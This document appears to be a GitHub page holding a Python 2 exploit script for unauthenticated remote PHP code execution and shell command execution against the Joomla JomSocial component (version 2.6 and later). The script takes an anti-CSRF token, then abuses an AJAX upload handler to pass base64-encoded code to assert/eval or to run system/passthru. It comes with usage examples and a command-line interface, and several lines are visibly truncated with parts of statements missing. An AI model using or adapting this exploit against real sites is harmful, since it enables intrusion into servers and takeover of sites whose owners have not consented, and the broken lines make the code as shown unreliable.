Find file
4d273b7 Feb 2, 2014
164 lines (148 sloc) 6.57 KB
# Joomla! JomSocial component >= 2.6 PHP code execution exploit
# Authors:
# - Matias Fontanini
# - Gaston Traberg
# This exploit allows the execution of PHP code without any prior
# authentication on the Joomla! JomSocial component.
# Note that in order to be able to execute PHP code, both the "eval"
# and "assert" functions must be enabled. It is also possible to execute
# arbitrary PHP functions, without using them. Therefore, it is possible
# to execute shell commands using "system", "passthru", etc, as long
# as they are enabled.
# Examples:
# Execute PHP code:
# ./ -u -p "echo 'Hello World!';"
# ./ -u -p /tmp/script_to_execute.php
# Execute shell commands(using system()):
# ./ -u -s "netstat -n"
# Exploit shell commands(using a user provided function, passthru in this case)
# ./ -u -s "netstat -natp" -c passthru
# Exploit execution example:
# $ python -u -p 'var_dump("Hello World!");'
# [i] Retrieving cookies and anti-CSRF token... Done
# [+] Executing PHP code...
# string(12) "Hello World!"
import urllib, urllib2, re, argparse, sys, os, cookielib
class Exploit:
token_request_data = 'option=com_community&view=frontpage'
exploit_request_data = 'option=community&no_html=1&task=azrul_ajax&func=photos,ajaxUploadAvatar&{0}=1&arg2=["_d_","Event"]&arg3=["_d_","374"]&arg4=["_d_","{1}"]'
json_data = '{{"call":["CStringHelper","escape", "{1}","{0}"]}}'
def __init__(self, url, user_agent = None, use_eval = True):
self.url = url
self.use_eval = use_eval
self.token_regex = re.compile('<input type=\"hidden\" name=\"([\w\d]{32})\" value=\"1\" \/>')
self.cookie_jar = cookielib.CookieJar()
self.token = self._retrieve_token()
self.result_regex = re.compile('method=\\\\"POST\\\\" enctype=\\\\"multipart\\\\/form-data\\\\"><br>(.*)<div id=\\\\"avatar-upload\\\\">', re.DOTALL)
self.command_regex = re.compile('(.*)\\[\\["as","ajax_calls","d",""\\]', re.DOTALL)
def _set_user_agent(self, user_agent):
self.user_agent = user_agent
def _make_opener(self):
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cookie_jar))
opener.addheaders.append(('Referer', self.url))
if self.user_agent:
opener.addheaders.append(('User-Agent', self.user_agent))
return opener
def _retrieve_token(self):
opener = self._make_opener()
sys.stdout.write('[i] Retrieving cookies and anti-CSRF token... ')
req =, Exploit.token_request_data)
data =
token = self.token_regex.findall(data)
if len(token) < 1:
print 'Failed'
raise Exception("Could not retrieve anti-CSRF token")
print 'Done'
return token[0]
def _do_call_function(self, function, parameter):
parameter = parameter.replace('"', '\\"')
json_data = Exploit.json_data.format(function, parameter)
json_data = urllib2.quote(json_data)
data = Exploit.exploit_request_data.format(self.token, json_data)
opener = self._make_opener()
req =, data)
if function == 'assert':
elif function in ['system', 'passthru']:
result = self.command_regex.findall(
if len(result) == 1:
return result[0]
return "[+] Error executing command."
result = self.result_regex.findall(
if len(result) == 1:
return result[0].replace('\\/', '/').replace('\\"', '"').replace('\\n', '\n')
return "[+] Error executing command."
def call_function(self, function, parameter):
if self.use_eval:
return self.eval("echo {0}('{1}')".format(function, parameter))
return self._do_call_function(function, parameter)
def disabled_functions(self):
return self.call_function("ini_get", "disable_functions")
def test_injection(self):
result = self.eval("echo 'HELLO' . ' - ' . 'WORLD';")
if 'HELLO - WORLD' in result:
print "[+] Code injection using eval works"
print "[+] Code injection doesn't work. Try executing shell commands."
def eval(self, code):
if code [-1] != ';':
code = code + ';'
return self._do_call_function('assert', "@exit(@eval(@base64_decode('{0}')));".format(code.encode('base64').replace('\n', '')))
parser = argparse.ArgumentParser(
description="JomSocial >= 2.6 - Code execution exploit"
parser.add_argument('-u', '--url', help='the base URL', required=True)
help='the PHP code to execute. Use \'-\' to read from stdin, or provide a file path to read from')
parser.add_argument('-s', '--shell-command', help='the shell command to execute')
parser.add_argument('-c', '--shell-function', help='the PHP function to use when executing shell commands', default="system")
parser.add_argument('-t', '--test', action='store_true', help='test the PHP code injection using eval', default=False)
parser.add_argument('-n', '--no-eval', action='store_false', help='don\'t use eval when executing shell commands', default=True)
args = parser.parse_args()
if not args.test and not args.php_code and not args.shell_command:
print '[-] Need -p, -t or -s to do something...'
url = args.url
if not url.startswith('http://') and not url.startswith('https://'):
url = 'http://' + url
exploit = Exploit(url, use_eval=args.no_eval)
if args.test:
elif args.php_code:
code = args.php_code
if args.php_code == '-':
print '[i] Enter the code to be executed:'
code =
elif os.path.isfile(code):
fd = open(code)
code =
except Exception:
print "[-] Error reading the file."
print '[+] Executing PHP code...'
print exploit.eval(code)
elif args.shell_command:
print exploit.call_function(args.shell_function, args.shell_command)
except Exception as ex:
print '[+] Error: ' + str(ex)